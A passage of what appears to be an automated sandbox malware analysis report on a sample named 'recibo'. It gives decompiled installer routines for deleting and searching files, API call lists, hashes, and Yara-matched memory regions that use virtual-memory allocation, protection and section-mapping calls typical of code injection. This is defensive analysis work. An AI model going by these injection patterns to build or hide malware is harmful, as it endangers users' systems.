                                                                                  0x71541fa2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154211c
                                                                                  0x71542120
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542126
                                                                                  0x7154212f
                                                                                  0x71542136
                                                                                  0x7154213e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542083
                                                                                  0x71542083
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541fbc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421a6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154208b
                                                                                  0x7154208d
                                                                                  0x7154208d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542196
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154219a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421a2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420d3
                                                                                  0x715420d5
                                                                                  0x715420d5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154209d
                                                                                  0x7154209f
                                                                                  0x7154209f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420af
                                                                                  0x715420b1
                                                                                  0x715420b1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420e1
                                                                                  0x715420e3
                                                                                  0x715420e3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715420ba
                                                                                  0x715420bc
                                                                                  0x715420bc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542272
                                                                                  0x71541ea5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541eab
                                                                                  0x71541eab
                                                                                  0x71541eb4
                                                                                  0x71541eb9
                                                                                  0x71541ebf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541ec5
                                                                                  0x71541ed2
                                                                                  0x71541ed8
                                                                                  0x71541ee2
                                                                                  0x71541ee8
                                                                                  0x71541ef0
                                                                                  0x71541f00
                                                                                  0x00000000
                                                                                  0x71541f00

                                                                                  APIs
                                                                                    • Part of subcall function 715412BB: GlobalAlloc.KERNEL32(00000040,?,715412DB,?,7154137F,00000019,715411CA,-000000A0), ref: 715412C5
                                                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 71541D2D
                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 71541D75
                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 71541D7F
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 71541D92
                                                                                  • GlobalFree.KERNEL32(?), ref: 71541E74
                                                                                  • GlobalFree.KERNEL32(?), ref: 71541E79
                                                                                  • GlobalFree.KERNEL32(?), ref: 71541E7E
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 71542068
                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 71542222
                                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 715422A1
                                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 715422B2
                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 7154230C
                                                                                  • lstrlenW.KERNEL32(00000808), ref: 71542326
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 245916457-0
                                                                                  • Opcode ID: ae3df4feb234a723de88c8fa929ac33ae3e875db2cb87ebcace4bbb90759d838
                                                                                  • Instruction ID: 971e6f915a2ac58f0257740e8f92cfc8afeaed39ccc38e1a21d215cfb4d67751
                                                                                  • Opcode Fuzzy Hash: ae3df4feb234a723de88c8fa929ac33ae3e875db2cb87ebcace4bbb90759d838
                                                                                  • Instruction Fuzzy Hash: 8D22CE75D0421ADEDB1ADFA4D9C02EDBBF1FB04305F20692ED9A6E7280D7706A85CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 663 405c49-405c6f call 405f14 666 405c71-405c83 DeleteFileW 663->666 667 405c88-405c8f 663->667 668 405e05-405e09 666->668 669 405c91-405c93 667->669 670 405ca2-405cb2 call 40653d 667->670 671 405db3-405db8 669->671 672 405c99-405c9c 669->672 676 405cc1-405cc2 call 405e58 670->676 677 405cb4-405cbf lstrcatW 670->677 671->668 675 405dba-405dbd 671->675 672->670 672->671 678 405dc7-405dcf call 406873 675->678 679 405dbf-405dc5 675->679 680 405cc7-405ccb 676->680 677->680 678->668 686 405dd1-405de5 call 405e0c call 405c01 678->686 679->668 684 405cd7-405cdd lstrcatW 680->684 685 405ccd-405cd5 680->685 687 405ce2-405cfe lstrlenW FindFirstFileW 684->687 685->684 685->687 703 405de7-405dea 686->703 704 405dfd-405e00 call 40559f 686->704 688 405d04-405d0c 687->688 689 405da8-405dac 687->689 691 405d2c-405d40 call 40653d 688->691 692 405d0e-405d16 688->692 689->671 694 405dae 689->694 705 405d42-405d4a 691->705 706 405d57-405d62 call 405c01 691->706 695 405d18-405d20 692->695 696 405d8b-405d9b FindNextFileW 692->696 694->671 695->691 699 405d22-405d2a 695->699 696->688 702 405da1-405da2 FindClose 696->702 699->691 699->696 702->689 703->679 707 405dec-405dfb call 40559f call 4062fd 703->707 704->668 705->696 708 405d4c-405d55 call 405c49 705->708 716 405d83-405d86 call 40559f 706->716 717 405d64-405d67 706->717 707->668 708->696 716->696 720 405d69-405d79 call 40559f call 4062fd 717->720 721 405d7b-405d81 717->721 720->696 721->696
                                                                                  C-Code - Quality: 98%
                                                                                  			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				short _v556;
                                                                                  				short _v558;
                                                                                  				struct _WIN32_FIND_DATAW _v604;
                                                                                  				signed int _t38;
                                                                                  				signed int _t52;
                                                                                  				signed int _t55;
                                                                                  				signed int _t62;
                                                                                  				void* _t64;
                                                                                  				signed char _t65;
                                                                                  				WCHAR* _t66;
                                                                                  				void* _t67;
                                                                                  				WCHAR* _t68;
                                                                                  				void* _t70;
                                                                                  
                                                                                  				_t65 = _a8;
                                                                                  				_t68 = _a4;
                                                                                  				_v8 = _t65 & 0x00000004;
                                                                                  				_t38 = E00405F14(__eflags, _t68);
                                                                                  				_v12 = _t38;
                                                                                  				if((_t65 & 0x00000008) != 0) {
                                                                                  					_t62 = DeleteFileW(_t68); // executed
                                                                                  					asm("sbb eax, eax");
                                                                                  					_t64 =  ~_t62 + 1;
                                                                                  					 *0x434f88 =  *0x434f88 + _t64;
                                                                                  					return _t64;
                                                                                  				}
                                                                                  				_a4 = _t65;
                                                                                  				_t8 =  &_a4;
                                                                                  				 *_t8 = _a4 & 0x00000001;
                                                                                  				__eflags =  *_t8;
                                                                                  				if( *_t8 == 0) {
                                                                                  					L5:
                                                                                  					E0040653D(0x42f270, _t68);
                                                                                  					__eflags = _a4;
                                                                                  					if(_a4 == 0) {
                                                                                  						E00405E58(_t68);
                                                                                  					} else {
                                                                                  						lstrcatW(0x42f270, L"\\*.*");
                                                                                  					}
                                                                                  					__eflags =  *_t68;
                                                                                  					if( *_t68 != 0) {
                                                                                  						L10:
                                                                                  						lstrcatW(_t68, 0x40a014);
                                                                                  						L11:
                                                                                  						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                  						_t38 = FindFirstFileW(0x42f270,  &_v604); // executed
                                                                                  						_t70 = _t38;
                                                                                  						__eflags = _t70 - 0xffffffff;
                                                                                  						if(_t70 == 0xffffffff) {
                                                                                  							L26:
                                                                                  							__eflags = _a4;
                                                                                  							if(_a4 != 0) {
                                                                                  								_t30 = _t66 - 2;
                                                                                  								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                  								__eflags =  *_t30;
                                                                                  							}
                                                                                  							goto L28;
                                                                                  						} else {
                                                                                  							goto L12;
                                                                                  						}
                                                                                  						do {
                                                                                  							L12:
                                                                                  							__eflags = _v604.cFileName - 0x2e;
                                                                                  							if(_v604.cFileName != 0x2e) {
                                                                                  								L16:
                                                                                  								E0040653D(_t66,  &(_v604.cFileName));
                                                                                  								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                  								if(__eflags == 0) {
                                                                                  									_t52 = E00405C01(__eflags, _t68, _v8);
                                                                                  									__eflags = _t52;
                                                                                  									if(_t52 != 0) {
                                                                                  										E0040559F(0xfffffff2, _t68);
                                                                                  									} else {
                                                                                  										__eflags = _v8 - _t52;
                                                                                  										if(_v8 == _t52) {
                                                                                  											 *0x434f88 =  *0x434f88 + 1;
                                                                                  										} else {
                                                                                  											E0040559F(0xfffffff1, _t68);
                                                                                  											E004062FD(_t67, _t68, 0);
                                                                                  										}
                                                                                  									}
                                                                                  								} else {
                                                                                  									__eflags = (_a8 & 0x00000003) - 3;
                                                                                  									if(__eflags == 0) {
                                                                                  										E00405C49(__eflags, _t68, _a8);
                                                                                  									}
                                                                                  								}
                                                                                  								goto L24;
                                                                                  							}
                                                                                  							__eflags = _v558;
                                                                                  							if(_v558 == 0) {
                                                                                  								goto L24;
                                                                                  							}
                                                                                  							__eflags = _v558 - 0x2e;
                                                                                  							if(_v558 != 0x2e) {
                                                                                  								goto L16;
                                                                                  							}
                                                                                  							__eflags = _v556;
                                                                                  							if(_v556 == 0) {
                                                                                  								goto L24;
                                                                                  							}
                                                                                  							goto L16;
                                                                                  							L24:
                                                                                  							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                  							__eflags = _t55;
                                                                                  						} while (_t55 != 0);
                                                                                  						_t38 = FindClose(_t70);
                                                                                  						goto L26;
                                                                                  					}
                                                                                  					__eflags =  *0x42f270 - 0x5c;
                                                                                  					if( *0x42f270 != 0x5c) {
                                                                                  						goto L11;
                                                                                  					}
                                                                                  					goto L10;
                                                                                  				} else {
                                                                                  					__eflags = _t38;
                                                                                  					if(_t38 == 0) {
                                                                                  						L28:
                                                                                  						__eflags = _a4;
                                                                                  						if(_a4 == 0) {
                                                                                  							L36:
                                                                                  							return _t38;
                                                                                  						}
                                                                                  						__eflags = _v12;
                                                                                  						if(_v12 != 0) {
                                                                                  							_t38 = E00406873(_t68);
                                                                                  							__eflags = _t38;
                                                                                  							if(_t38 == 0) {
                                                                                  								goto L36;
                                                                                  							}
                                                                                  							E00405E0C(_t68);
                                                                                  							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                                                  							__eflags = _t38;
                                                                                  							if(_t38 != 0) {
                                                                                  								return E0040559F(0xffffffe5, _t68);
                                                                                  							}
                                                                                  							__eflags = _v8;
                                                                                  							if(_v8 == 0) {
                                                                                  								goto L30;
                                                                                  							}
                                                                                  							E0040559F(0xfffffff1, _t68);
                                                                                  							return E004062FD(_t67, _t68, 0);
                                                                                  						}
                                                                                  						L30:
                                                                                  						 *0x434f88 =  *0x434f88 + 1;
                                                                                  						return _t38;
                                                                                  					}
                                                                                  					__eflags = _t65 & 0x00000002;
                                                                                  					if((_t65 & 0x00000002) == 0) {
                                                                                  						goto L28;
                                                                                  					}
                                                                                  					goto L5;
                                                                                  				}
                                                                                  			}


















                                                                                  0x00405d18
                                                                                  0x00405d20
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405d22
                                                                                  0x00405d2a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405d8b
                                                                                  0x00405d93
                                                                                  0x00405d99
                                                                                  0x00405d99
                                                                                  0x00405da2
                                                                                  0x00000000
                                                                                  0x00405da2
                                                                                  0x00405ccd
                                                                                  0x00405cd5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405c91
                                                                                  0x00405c91
                                                                                  0x00405c93
                                                                                  0x00405db3
                                                                                  0x00405db5
                                                                                  0x00405db8
                                                                                  0x00405e09
                                                                                  0x00405e09
                                                                                  0x00405e09
                                                                                  0x00405dba
                                                                                  0x00405dbd
                                                                                  0x00405dc8
                                                                                  0x00405dcd
                                                                                  0x00405dcf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405dd2
                                                                                  0x00405dde
                                                                                  0x00405de3
                                                                                  0x00405de5
                                                                                  0x00000000
                                                                                  0x00405e00
                                                                                  0x00405de7
                                                                                  0x00405dea
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405def
                                                                                  0x00000000
                                                                                  0x00405df6
                                                                                  0x00405dbf
                                                                                  0x00405dbf
                                                                                  0x00000000
                                                                                  0x00405dbf
                                                                                  0x00405c99
                                                                                  0x00405c9c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405c9c

                                                                                  APIs
                                                                                  • DeleteFileW.KERNELBASE(?,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                  • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                  • FindFirstFileW.KERNELBASE(0042F270,?,?,?,0040A014,?,0042F270,?,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                  • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                  • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                  • API String ID: 2035342205-1953461807
                                                                                  • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                  • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                  • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                  • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (O$n$vq$x`#
                                                                                  • API String ID: 0-2414866765
                                                                                  • Opcode ID: 364243280596b6ee458ea9728067a476028482996d9f9e6dd7d6044235323a9e
                                                                                  • Instruction ID: 670f4795af3904f7b3072d5b61e3f29c25ca48f01b1bc437a59dd1fe9360339d
                                                                                  • Opcode Fuzzy Hash: 364243280596b6ee458ea9728067a476028482996d9f9e6dd7d6044235323a9e
                                                                                  • Instruction Fuzzy Hash: 2BE1C275A083858FDB369E38CC657DB77A2EF86390F59411ECC898F205D3318A46CB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: dFu\$O
                                                                                  • API String ID: 0-335019749
                                                                                  • Opcode ID: 6d65a41d2fbcb8f7db7cfc83fed42c161fcda9a0b8141ef0e4e47e579f24c240
                                                                                  • Instruction ID: ade4e1c78e48485e3431f50b4cef910647dae9d8103cb7b3ae9e69fb76f06ab8
                                                                                  • Opcode Fuzzy Hash: 6d65a41d2fbcb8f7db7cfc83fed42c161fcda9a0b8141ef0e4e47e579f24c240
                                                                                  • Instruction Fuzzy Hash: 49E19A7560434A9FDF319E388D503DB37A7AF963A0FA5461EDC89DB245D3318A868B02
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: &0Vs$vq
                                                                                  • API String ID: 1029625771-2351862953
                                                                                  • Opcode ID: 636e6442bf8911caf6dbb6b5e0b7f3a7a523b02eb722f209d1992edcdd86d233
                                                                                  • Instruction ID: 5fdf3398ffb52cc86d045447a9a4baaef9138191e8e206e410fa34fc89369966
                                                                                  • Opcode Fuzzy Hash: 636e6442bf8911caf6dbb6b5e0b7f3a7a523b02eb722f209d1992edcdd86d233
                                                                                  • Instruction Fuzzy Hash: 89A1AC729043559FCF329E29CC547DA7BA2EF5A350F65411EDCC99B300D7324989CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 02CC34F4: LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  • NtAllocateVirtualMemory.NTDLL ref: 02CC4519
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                  • String ID: zUf
                                                                                  • API String ID: 2616484454-1590610335
                                                                                  • Opcode ID: f89817a2134b5fffb818efa1475f54a25c383d411f8e34121f73e06a8a92b41e
                                                                                  • Instruction ID: 7b4b9a313d6eef882eed3e0592d3e3136515f57ff281ba6a9fb3ce00c09ad9fc
                                                                                  • Opcode Fuzzy Hash: f89817a2134b5fffb818efa1475f54a25c383d411f8e34121f73e06a8a92b41e
                                                                                  • Instruction Fuzzy Hash: 91918D75A043498FDF399E24C8717EE3BA2EF5A350F69852DDC898B214D731CA85CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtProtectVirtualMemory.NTDLL(-BCF9EB3C,?,?,?,?,02CC53C4,03C46E6A,B1A257AB,?,-1B0DC8A7), ref: 02CC6272
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID: s:i&
                                                                                  • API String ID: 2706961497-385934651
                                                                                  • Opcode ID: 384cd5ffcdba308440187aa2f330d06ee0877c2d39bc515448a3159d21d4967e
                                                                                  • Instruction ID: 2a7451321cc750af4978b83d7089d41b549d89c9ecf0af677e72b84f376ade80
                                                                                  • Opcode Fuzzy Hash: 384cd5ffcdba308440187aa2f330d06ee0877c2d39bc515448a3159d21d4967e
                                                                                  • Instruction Fuzzy Hash: 04014471B002945FEB24CE59CDD46DEB7AAEF99700F85802EDC4967304C630AE09CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00406873(WCHAR* _a4) {
                                                                                  				void* _t2;
                                                                                  
                                                                                  				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                                                  				if(_t2 == 0xffffffff) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				FindClose(_t2);
                                                                                  				return 0x4302b8;
                                                                                  			}





                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 44w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77343420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileFirst
                                                                                  • String ID:
                                                                                  • API String ID: 2295610775-0
                                                                                  • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                  • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                  • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                  • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: d8894260c7abf72f78e67b47b5bb06edf56f4ba62d92c8c342255964ba9d88fc
                                                                                  • Instruction ID: 18d2d883cce1011e41cb667547c22e39b54550476d23af5ef2eac14d41f39e46
                                                                                  • Opcode Fuzzy Hash: d8894260c7abf72f78e67b47b5bb06edf56f4ba62d92c8c342255964ba9d88fc
                                                                                  • Instruction Fuzzy Hash: 12410670A00399DFCB39DE249D587DA77A2AF66360FA480AEEC498F201D7309B45DB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(?,0981125B), ref: 02CC2D13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 19e005512356690749cbdb71695c36a9ae9b3f87fffc99e71f36484d04bad449
                                                                                  • Instruction ID: 81f5d69bab2f4419b1c16f80771570733749f67ede48786198c639068f0fccfa
                                                                                  • Opcode Fuzzy Hash: 19e005512356690749cbdb71695c36a9ae9b3f87fffc99e71f36484d04bad449
                                                                                  • Instruction Fuzzy Hash: A321AF756083459BDB24AE39C9A63EFB7A2BF52390F96492DDDC2864A1D3318185CF03
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtMapViewOfSection.NTDLL(00000001,02CC6EA6), ref: 02CC6A45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: SectionView
                                                                                  • String ID:
                                                                                  • API String ID: 1323581903-0
                                                                                  • Opcode ID: a669d4af5395dad1a714df4aa92651a8b233b25536b77fce8decb1e16edb34d3
                                                                                  • Instruction ID: 9648d973b33665db56a3e07e843dd8a958d1565af59f04519ce39a9eb70eeee3
                                                                                  • Opcode Fuzzy Hash: a669d4af5395dad1a714df4aa92651a8b233b25536b77fce8decb1e16edb34d3
                                                                                  • Instruction Fuzzy Hash: 8D019230688346CBCB289D758B643EA37A5EFD9394F35813CCD878B604E7349585CB01
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  [Control-flow graph of function 0x403f9a; node legend: Executed / Not Executed]
                                                                                  C-Code - Quality: 84%
                                                                                  			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                                  				struct HWND__* _v28;
                                                                                  				void* _v84;
                                                                                  				void* _v88;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				signed int _t34;
                                                                                  				signed int _t36;
                                                                                  				signed int _t38;
                                                                                  				struct HWND__* _t48;
                                                                                  				signed int _t67;
                                                                                  				struct HWND__* _t73;
                                                                                  				signed int _t86;
                                                                                  				struct HWND__* _t91;
                                                                                  				signed int _t99;
                                                                                  				int _t103;
                                                                                  				signed int _t117;
                                                                                  				int _t118;
                                                                                  				int _t122;
                                                                                  				signed int _t124;
                                                                                  				struct HWND__* _t127;
                                                                                  				struct HWND__* _t128;
                                                                                  				int _t129;
                                                                                  				intOrPtr _t130;
                                                                                  				long _t133;
                                                                                  				int _t135;
                                                                                  				int _t136;
                                                                                  				void* _t137;
                                                                                  				void* _t146;
                                                                                  
                                                                                  				_t130 = _a8;
                                                                                  				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                                  					_t34 = _a12;
                                                                                  					_t127 = _a4;
                                                                                  					__eflags = _t130 - 0x110;
                                                                                  					 *0x42d250 = _t34;
                                                                                  					if(_t130 == 0x110) {
                                                                                  						 *0x434f08 = _t127;
                                                                                  						 *0x42d264 = GetDlgItem(_t127, 1);
                                                                                  						_t91 = GetDlgItem(_t127, 2);
                                                                                  						_push(0xffffffff);
                                                                                  						_push(0x1c);
                                                                                  						 *0x42b230 = _t91;
                                                                                  						E00404499(_t127);
                                                                                  						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                                                                                  						 *0x433ecc = E0040140B(4);
                                                                                  						_t34 = 1;
                                                                                  						__eflags = 1;
                                                                                  						 *0x42d250 = 1;
                                                                                  					}
                                                                                  					_t124 =  *0x40a368; // 0x0
                                                                                  					_t136 = 0;
                                                                                  					_t133 = (_t124 << 6) +  *0x434f20;
                                                                                  					__eflags = _t124;
                                                                                  					if(_t124 < 0) {
                                                                                  						L36:
